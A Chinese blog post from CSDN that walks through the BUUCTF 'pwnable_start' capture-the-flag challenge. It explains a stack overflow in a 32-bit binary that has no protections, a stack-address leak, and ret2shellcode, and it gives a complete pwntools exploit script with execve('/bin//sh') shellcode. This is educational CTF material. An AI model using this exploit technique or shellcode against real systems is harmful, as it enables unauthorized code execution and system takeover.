BUUCTF--pwnable_start1

最新推荐文章于 2024-05-14 23:13:17 发布
最新推荐文章于 2024-05-14 23:13:17 发布
阅读量367 收藏 11
点赞数 7
分类专栏: pwn CTF 文章标签: 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30528603/article/details/135429215
版权
CTF 同时被 2 个专栏收录
26 篇文章 0 订阅
订阅专栏
pwn
23 篇文章 1 订阅
订阅专栏

查看保护:

32位程序保护全没开,黑盒测试下效果:

存在栈溢出,那么这题的想法就是直接ret2shellcode了。IDA中看看具体流程:

出奇的少,这题不能看反汇编的代码,直接去看汇编:

主要就2个功能,通过系统调用来执行读写功能,将字符串Let's start the CTF:输出,然后接收用户输入。我们看到注释下标注了长度为0x14。也就是我们能刚好覆盖到返回地址,但是我的shellcode有0x18个字节。根本不够执行完全部,而且目前没有有用的信息来让我ret2stack。因此我们要去调试看看能不能利用什么信息:

我们观察在代码的最开始,会将一个esp压入栈中,紧接着栈的布局将变成如此:

5个a是我输入的测试数据。ecx将和esp将指向用户输入数据的起始位置。此时esp要索引到返回地址,将直接执行add esp,14h。执行完后esp将指向旧的esp:

而且我们惊奇的发现,这两个值相差0x4,因此我们需要通过write函数将他泄露出来,紧着这我们的返回地址就有了,步骤shellocode就是要返回到布局的栈地址处执行。原理我讲明白了,直接上exp:

from pwn import *
context.log_level = 'debug'
context.arch = 'i386'
 
io = process('./start')
#io = remote('node5.buuoj.cn',28971)
gdb.attach(io)
io.recv()
mov_ecx_esp = 0x8048087
payload1 = b'a'*0x14 + p32(mov_ecx_esp)
io.send(payload1)

leak_stack_addr = u32(io.recv(4))
cur_esp = leak_stack_addr+0x14
print(hex(leak_stack_addr))
payload2 = b'a'*0x14 + p32(cur_esp)
shellcode ='''
xor eax,eax
xor edx,edx
push edx
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
xor ecx,ecx
mov al,0xb
int 0x80                
'''

shellcode=asm(shellcode)

print(len(shellcode))
payload2 += shellcode
io.send(payload2)
pause()
#gdb.attach(io)
io.interactive()

call就不要ret
关注
  • 7
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF pwnable_start心路历程
weixin_45441024的博客
11-28 4151
记第一篇pwn的做题心路历程 pwnable_start 我们把题目下载下来,在ubuntu里面进行一下检查,checksec+文件路径 看起来是一道非常其简单的题,接下来放到IDA里面查看一下: 我们来分段进行分析,首先 系统执行了如下命令: 程序push了一个esp,push了一个exit(退出程序) 紧接着执行了如下指令,这里说明一下xor eax,eax的值等于0,在这里程序将这四个寄存器的值都清空为0了 这里push了共计为20(0x14)个字节,至于具体是什么我也不知道 这里我们可以
FM350-1_Getting_Start
03-16
FM350-1_Getting_Start.pdf 介绍了关于FM350-1_Getting_Start的详细说明,提供S7-300的技术资料的下载。
[BUUCTF]刷题:pwnable_start
zyxx_wjc的博客
07-06 211
BUUCTF:pwnable_start题解
关于BUUCTF之“pwnable_start”的一点小结
Probeginner的博客
12-07 280
之前这个用汇编代码编写shellcode的题目做的较少,这题算是开端。 正常检查程序保护,啥也没开。 我们先分析一波程序: 需要用到一点汇编知识,总的意思是:四个xor清零四个寄存器。而后压栈数据,是最开始会输出的“Let’s start the CTF:”然后调用write函数输出上面内容0x14个字节。而后调用read函数输入最大0x3c字节内容。在add esp ;然后返回。 我们选择shellcode在栈上执行办法。所以我们需要泄露栈地址,计算偏移量,覆盖返回地址为shellcode所在地址 .
BUUCTF pwnable_start
qq_63528163的博客
09-04 116
题解
[BUUCTF]PWN——pwnable_start
mcmuyanga的博客
12-05 1112
pwnable_start 附件 步骤: 例行检查,32位程序,什么保护都没开,首先想到的是ret2shellcode的方法 本地试运行一下,看看程序大概的情况 32位ida载入,没法f5,好在汇编不长,看得懂 一开始调用write函数输出了let’s start the ctf,4是write函数的调用号,之后的调用号是3,调用了read函数,我们知道dl这个寄存器是控制输入字符的多少的,也就是所我们可以输入0x3c个字符,也就是执行了 write(1,buf,0x14) read
[BUUCTF-pwn] pwnable_fsb
weixin_52640415的博客
02-05 764
首先是一个小坑,坑人的坑。题目给的32位no PIE的程序与远程上的不同,远程是64位开PIE。 程序先作了一个抬栈,然后可以输入4次printf,再输入key相同则给出shell (远程有原码,很容易看) #include <stdio.h> #include <alloca.h> #include <fcntl.h> unsigned long long key; char buf[100]; char buf2[100]; int fsb(char** a
[BUUCTF-pwn] pwnable_secret_garden
weixin_52640415的博客
11-26 627
这个题本身没有难度,小难点在one_gadget+realloc偏移 堆题全保护就不用说了,漏洞在free时没有删指针 int m3free() { int result; // eax _DWORD *v1; // rax unsigned int v2; // [rsp+4h] [rbp-14h] BYREF unsigned __int64 v3; // [rsp+8h] [rbp-10h] v3 = __readfsqword(0x28u); if ( !unk_20
PWN-PRACTICE-BUUCTF-15
P1umH0的博客
08-09 130
PWN-PRACTICE-BUUCTF-15axb_2019_fmt32wustctf2020_getshell_2others_babystackpwnable_start axb_2019_fmt32 格式化字符串漏洞 第一次打印出printf的真实地址,进而计算libc基地址,得到system真实地址 第二次修改got表,使printf的got指向system的真实地址,后面执行printf时实际上是执行system from pwn import * #p=process('./axb_2019_f
[BUUCTF] ciscn_2019_s_9
zyxx_wjc的博客
07-10 221
ciscn_2019_s_9
copy-to-start-up.rar_Start Up
09-23
copy file to startup using vb6
Software-start-up-screen.rar_Start Up
09-23
软件启动画面的介绍,交给大家简单的软件画面启动,含有代码
Video-When-Start-Up-Form.rar_Start Up
09-20
this simple code demonstrate how to start a video clip at your project start up
eapp-corp-quick-start-java_后台_
09-30
小程序后台脚手架,用于快速构建小程序后台
从需求角度介绍PasteSpider(K8S平替部署工具适合于任何开发语言)
05-14 1443
Kubernetes的强大毋庸置疑,但是你有问自己这么个大杀器真的适合你么?这里推荐一款更加小巧的容器部署工具,集报表,发布,环境,通知于一身的PasteSpider! 支持git/svn发布,支持平滑升级,支持环境隔离,支持用户隔离,支持运行变量设定等,关键易上手!
王博外文文献.pdf
最新发布
05-23
王博外文文献.pdf
-param:JOB_NAME=job_ads_fin_wip_account_allot_d -param:ETL_FILE=/19_ADS_FIN/ETL/job_ads_fin_wip_account_allot_d.kjb -param:MIN_START_DATE=20230701 -param:MIN_END_DATE=20230702 -param:MAX_START_DATE=20230709 -param:MAX_END_DATE=20230710 -param:INCR_STEP=1M
07-11
这看起来像是一组作业参数的设置。这些参数用于指定一个名为"job_ads_fin_wip_account_...- INCR_STEP:增量步长,设定为"1M"。 这些参数可能会在作业执行过程中被使用,用于指定作业的输入、输出、日期范围等信息。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值